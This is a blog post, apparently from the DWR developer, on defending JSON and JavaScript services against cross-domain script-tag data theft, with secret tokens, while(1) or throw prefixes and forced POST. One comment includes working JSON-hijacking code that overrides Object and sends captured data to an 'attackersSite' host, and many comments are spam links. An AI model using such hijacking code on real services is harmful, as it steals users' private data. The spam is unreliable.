How to Protect a JSON or Javascript Service
There have been lots of explanations recently of the dangers of JSON or JavaScript remoting. This post is about what you can do to protect your scripts.
The Problem
The issues have been explained before, so I'm going to assume some knowledge of the problem. If you're not sure, some stuff to read:
- I blogged that JSON is not as safe as people think it is, and updated it with more issues the next day. I've also written about CSRF too.
- Dan Morrill has written an excellent and lengthy summary. The fixes are focused on GWT, but the issues are the same for everyone.
- Brent Ashley has just published on developerWorks, about the future of cross-domain requests. The article is tangentially relevant, but there is a particularly good set of linked articles.
The Solutions
So what are the solutions? I think there are 3 options. Each has their pros and cons:
- Use a Secret in the Request
- Force pre-eval() Processing
- Force POST requests
This post is a shortened version of the detailed description of what DWR does If you are interested in the options DWR takes and how you can configure it, you should read page.
1. Use a Secret in the Request
If you can only support one of these protections, this is the one to chose. Including a secret in the request allows the server to reject the request as invalid before any actions take place. It is common to include the secret in the URL, however this is a slightly vulnerable position for a secret since it is likely to turn up in web server log files and so on.
It is possible to use cookie values like PHPSESSIONID or JSESSIONID read using Javascript as the secret. The browsers cross-domain rules should prevent attackers from discovering this cookie. However this method will stop working as people begin to switch to using HttpOnly cookies. So it is better to start with a separate secret.
2. Force pre-eval() Processing
Since <script> tag remoting does not allow you to process the JSON or Javascript before it is eval()ed you can protect your JSON by forcing it to be manipulated before eval(). All 3 of these techniques will prevent your request from being pure JSON, however you may rank security above purity. There are 3 ways to do this:
- Wrap the JSON in a comment. For example,
/* { 'data':'protected' } */. When this is eval()ed, there will be no result, however if you have fetched the data using XHR or iframe, you can do some string manipulation before eval() to remove the leading /* and trailing */.
This method is good for plain JSON, however if you are using Javascript which could contain /* comments */, then you should not use this technique because comments in Javascript do not nest. - Prefix the script with '
while(1);' Since this is an infinite loop, if causes browsers to hang, and maybe give an error message. Either way the script does not get executed.
There is a potential vulnerability that some browser may allow you to override the action of while using something like this: 'function while() {}'. However I don't know of any such browser.
Google use this method to protect data in GMail. 'while(1);' is possibly better than 'while(true);' in case there are any browsers that allow you to redefine truth. - Prefix the script with '
throw new Error("message");'. This is a neat solution in that it allows you to explain what is wrong to users that get the message by mistake. DWR uses this method.
It is potentially vulnerable to some browser allowing an attacker to redefine the Error or String constructors to prevent the throw from happening, however this does not work on any browser that I know of, and it's hard to see how it could happen.
3. Force POST Requests
Since browsers use GET to process <script> tags, you can prevent <script> tags from working by denying GET requests for some JavaScript resource. This is the most common solution, however it is also perhaps the weakest.
Firstly XHR-POST doesn't work with older versions of Safari, so some support for GET is often useful.
More importantly future versions of Firefox are touted to include cross-domain XHR support. While we don't have exact knowledge of how this will happen, it would be foolish to base your security plans on this technique holding up.
Finally, we're working in an environment where new possibilities are popping up every day - betting your security on a system that works more by fluke than design isn't a great idea in my opinion.
By default DWR denies POST requests for belt and braces security, however this is customizable to allow support for older versions of Safari.
Re: How to Protect a JSON or Javascript Service
As for hiding a secret in the request, how about doing it via basic HTTP authentication? That will keep URLs sane, and provide a nice log in the server of attempts at access, as well as keep the secret out of the server.
HTTP authentication has (rightfully) been avoided in the past because browser UI support is lacking, and because writing a CGI on Apache that does its own authentication seems impossible. However, going over XHR, no UI is needed, and other frameworks are making it possible to programatically send a response code other than "200 OK."
Re: How to Protect a JSON or Javascript Service
Joe Walker looks at a few solutions such as:
1. Use a Secret in the Request
2. Force pre-eval() Processing
3. Force POST requests
My favourite drug store buy generic Lasix
Re: How to Protect a JSON or Javascript Service
why not just create a simple syntax error? So, for example, print "~" at the start of the file. It's invalid javascript, and it saves a few bytes and makes the replacement smaller. Slightly better, no?
<a rel="dofollow" href="http://www.health002.com">medical questions answered | <a rel="dofollow" href="http://www.freeallrecipes.com">easy healthy recipes | <a rel="dofollow" href="http://www.chineseop.com">food health questions
How to Protect a JSON or Javascript Service
I found a lot of information just by reading this essay. Joe Walker's site is very useful especially to a newbie like me. This is a good break before I write my essay.
How to Protect a JSON or Javascript Service
why not just create a simple syntax error? So, for example, print "~" at the start of the file. It's invalid javascript, and it saves a few bytes and makes the replacement smaller. Slightly better, no? medical questions answered | easy healthy recipes
Re: How to Protect a JSON or Javascript Service
Wanna get rid of cellulite? Visit one of the link below
How To Get Rid Of Cellulite,
Get Rid Of Cellulite,
Re: How to Protect a JSON or Javascript Service
I'm trying to wrap my head around how what a DWR response looks like ...
isn't the response a text/html mimetype, with a <script> tag that contains the JSON to be eval'ed ? In which case an external <script src="" /> shouldn't be able to parse the payload because it would be:
1) of the wrong mimetype: text/html vs application/x-javascript
2) starts out with a <script> tag which isn't valid executable javascript
Or did you find that despite 1) and 2) browsers still manage to parse such payload?
Re: How to Protect a JSON or Javascript Service
DWR's response doesn't have a script tag because it doesn't need one. You are right that if it was there, it would prevent the request from executing. The 'throws' prefix is what we do to stop that happening.
DWR operates in many different modes (iframe/xhr/script-tag) so the exact form of the response varies. The most at-risk version is pure Javascript.
Re: How to Protect a JSON or Javascript Service
Do I miss something?
If I'm using code like this:
var toSteal=[];
var idx=0;
function steal(key){
toSteal[key]['killme']=0;
}
function Object() {
var obj = this;
var curr = idx++;
toSteal[curr] = obj;
// define a setter for the killme property
this.__defineSetter__('killme', function(x) {
for (key in obj) {
if (key != 'killme') {
//alert('Data stolen from array: ' + key + '=' + obj[key]);
document.images[0].src="http://attackersSite:8080/webservice/login?data="+key+":::"+obj[key];
}
}
});
// Steal the data when the JSON parse is done
setTimeout('steal('+curr+')',0);
}
The: document.images[0].src="http://attackersSite:8080/webservice/login?data="+key+":::"+obj[key];
sends a GET with the JSON data to the attackers Server. I setted up a little web service which handles the GET and writes the the data into a text file.
In the text file I can see/read that the JSON data is prefixed with "while(1);".
With this information I can use my web service to cut off the "while(1);" before eval() it .
Do i missing something or is this possible like i discribe ?
Re: How to Protect a JSON or Javascript Service
There have been several posts recently of the dangers of JSON or JavaScript services. This article describes 3 solutions to the problems and how effective they are at protecting your data.buy lasix online
Re: How to Protect a JSON or Javascript Service
It is obvious that JSON itself is not as safe as what they claim to be. But the protection of Java-script service still lies within our own carefulness. There are quite effective ways to solve this. However, in any way you look at it it will always have its flaws. You just need to choose the one that will entirely fit you. Regards - Car Leasing
Re: How to Protect a JSON or Javascript Service
This is a great post. I work for a cheap health insurance and I am learning web design and for a new carreer.
Re: How to Protect a JSON or Javascript Service
Although JSON is intended as a data serialization format, its design as a subset of the JavaScript programming language poses several security concerns. These concerns center on the use of a JavaScript interpreter to dynamically execute JSON text as JavaScript, thus exposing a program to errant or malicious script contained therein—often a chief concern when dealing with data retrieved from the internet. While not the only way to process JSON, it is an easy and popular technique, stemming from JSON's design to be compatible with JavaScript's eval() function, and illustrated by the following code examples.Greeting, Sam
Discount Vouchers | Facilities Management Jobs, FM jobs | <a href="http://www.pass-guaranteed.com/N10-004.htm"> N10-004 Practice Exam Questions
Re: How to Protect a JSON or Javascript Service
i think you are onto something here with this. I would def go with that. Have you loked into the alternatives? they are very competitive with this. Bathroom Studio Used Computers
Re: How to Protect a JSON or Javascript Service
I was looking for some detailed article about scope of JSON and how to save from the negative sides. I am happy to find your post for exactly what I was looking for. I had no basic knowledge the problem so your previous posts helped a lot to understand the situation.
Your guidelines are very helpful to me, I will apply it to get some good results. Thanks for sharing your knowledge. Oklahoma Expungement Lawyer
Re: How to Protect a JSON or Javascript Service
GWT (http://groups.google.com/group/Google-Web-Toolkit/web/security-for-gwt-applications) team has published an article on Security for GWT Applications that delves into how GWT handles JavaScript vulnerabilities such as leaking data, cross-site scripting, forging requests, JSON and XSRF. streamline refinance
Re: How to Protect a JSON or Javascript Service
Thank you for this piece of advice.Although JSON was based on a subset of the JavaScript programming language (specifically, Standard ECMA-262 3rd Edition—December 1999) and is commonly used with that language, it is considered to be a language-independent data format.Thanks
Re: How to Protect a JSON or Javascript Service
Very detailed article about JSON, its scope and how to save from its negative aspects. This is what I was looking. Your previous posts about JSON proved very helpful for me as I am beginner and still trying to be perfect on using JSON. I am happy to find your posts very helpful for me. I hope you will extending our knowledge base in future. Thanks Presentation Skills
Re: How to Protect a JSON or Javascript Service
I agree good comment. I really think your on to something with this. good job. farmville cheats
Re: How to Protect a JSON or Javascript Service
Using a secret is not the answer for that issue all the time. Sometimes it tends not to work. I have checked it several times personally. accelerated learning systems
Re: How to Protect a JSON or Javascript Service
It is obvious that JSON itself is not as safe as what they claim to be. But the protection of Java-script service still lies within our own carefulness. There are quite effective ways to solve this.
Data Recovery
Re: How to Protect a JSON or Javascript Service
The main drawback of the JSON is the lack of security as discussed in this article as well. That was the main talking point about it among the most developers in software world. Gilbert Locksmith